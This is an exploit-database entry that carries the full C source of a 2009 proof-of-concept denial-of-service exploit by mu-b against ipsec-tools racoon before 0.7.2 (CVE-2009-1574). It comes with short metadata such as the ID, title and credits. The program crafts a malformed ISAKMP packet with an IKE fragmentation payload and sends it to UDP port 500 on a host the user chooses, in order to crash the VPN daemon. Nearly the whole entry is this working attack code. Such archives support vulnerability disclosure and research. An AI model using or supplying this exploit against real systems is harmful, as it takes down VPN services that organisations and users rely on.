ID

VAR-E-200904-0795

CVE

EDB ID

8669

TITLE

IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service Vulnerabilities (PoC) - Multiple dos Exploit

DESCRIPTION

IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service Vulnerabilities (PoC). CVE-2009-1574CVE-54286 . dos exploit for Multiple platform

AFFECTED PRODUCTS

EXPLOIT

/* racoon-isakmp-dos.c
*
* Copyright (c) 2009 by <mu-b@digit-labs.org>
*
* ipsec-tools racoon frag-isakmp DoS POC
* by mu-b - Thu Apr 02 2009
*
* - Tested on: ipsec-tools-0.7.1
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
*/

#include <stdio.h>
#include <stdlib.h>

#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>

#define DEF_PORT 500
#define PORT_ISAKMP DEF_PORT

#define ISAKMP_VERSION_NUMBER 0x10
#define ISAKMP_ETYPE_BASE 1 /* Base */

/* Frag does not seems to be documented */
#define ISAKMP_NPTYPE_FRAG 132 /* IKE fragmentation payload */

/* flags */
#define ISAKMP_FRAG_LAST 1

typedef u_char cookie_t[8];

/* 3.1 ISAKMP Header Format */
struct isakmp {
cookie_t i_ck; /* Initiator Cookie */
cookie_t r_ck; /* Responder Cookie */
unsigned char np; /* Next Payload Type */
unsigned char v;
unsigned char etype; /* Exchange Type */
unsigned char flags; /* Flags */
unsigned int msgid;
unsigned int len; /* Length */
};

/* IKE fragmentation payload */
struct isakmp_frag {
unsigned short unknown0; /* always set to zero? */
unsigned short len;
unsigned short unknown1; /* always set to 1? */
unsigned char index;
unsigned char flags;
};

/* used to verify the r_ck. */
static u_char r_ck0[] = { 0,0,0,0,0,0,0,0 };

static void
isa_kmp_dos (char *host)
{
char buf[sizeof (struct isakmp) +
sizeof (struct isakmp_frag)];
struct isakmp *hdr;
struct isakmp_frag *frag;
struct sockaddr_in saddr;
struct hostent *hp;
int fd, i, len, n;

if ((fd = socket (AF_INET, SOCK_DGRAM, 0)) == -1)
{
perror ("socket()");
exit (EXIT_FAILURE);
}

if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (EXIT_FAILURE);
}

memset (&saddr, 0, sizeof saddr);
memcpy ((char *) &saddr.sin_addr, hp->h_addr, hp->h_length);
saddr.sin_family = AF_INET;
saddr.sin_port = htons (PORT_ISAKMP);

/* formulate request */
memset (buf, 0, sizeof (buf));

hdr = (struct isakmp *) buf;
frag = (struct isakmp_frag *) (hdr + 1);

for (i = 0; i < sizeof (hdr->i_ck); i++)
hdr->i_ck[i] = (rand () % 255) + 1;

memcpy (&hdr->r_ck, r_ck0, sizeof (hdr->r_ck));
hdr->v = ISAKMP_VERSION_NUMBER;
hdr->flags = 0;
hdr->etype = ISAKMP_ETYPE_BASE;
hdr->msgid = 0;
hdr->np = ISAKMP_NPTYPE_FRAG;

len = sizeof (struct isakmp) + sizeof (struct isakmp_frag);
hdr->len = htonl (len);

frag->len = htons (sizeof (struct isakmp_frag));
frag->index = 1;
frag->flags = ISAKMP_FRAG_LAST;

n = sendto (fd, hdr, len, 0, (struct sockaddr *) &saddr, sizeof saddr);
if (n < 0 || n != len)
{
fprintf (stderr, "isa_kmp_dos: sendto %d != %d\n", n, len);
exit (EXIT_FAILURE);
}

close (fd);
}

int
main (int argc, char **argv)
{
printf ("ipsec-tools racoon frag-isakmp DoS PoC\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");

if (argc <= 1)
{
fprintf (stderr, "Usage: %s <host>\n", argv[0]);
exit (EXIT_SUCCESS);
}

printf ("* crashing racoon... ");
isa_kmp_dos (argv[1]);
printf ("done\n\n");

return (EXIT_SUCCESS);
}

// milw0rm.com [2009-05-13]

EXPLOIT LANGUAGE

c

PRICE

free

TYPE

Multiple Remote Denial of Service Vulnerabilities (PoC)

CREDITS

mu-b

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

2022-07-27T09:28:22.383000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE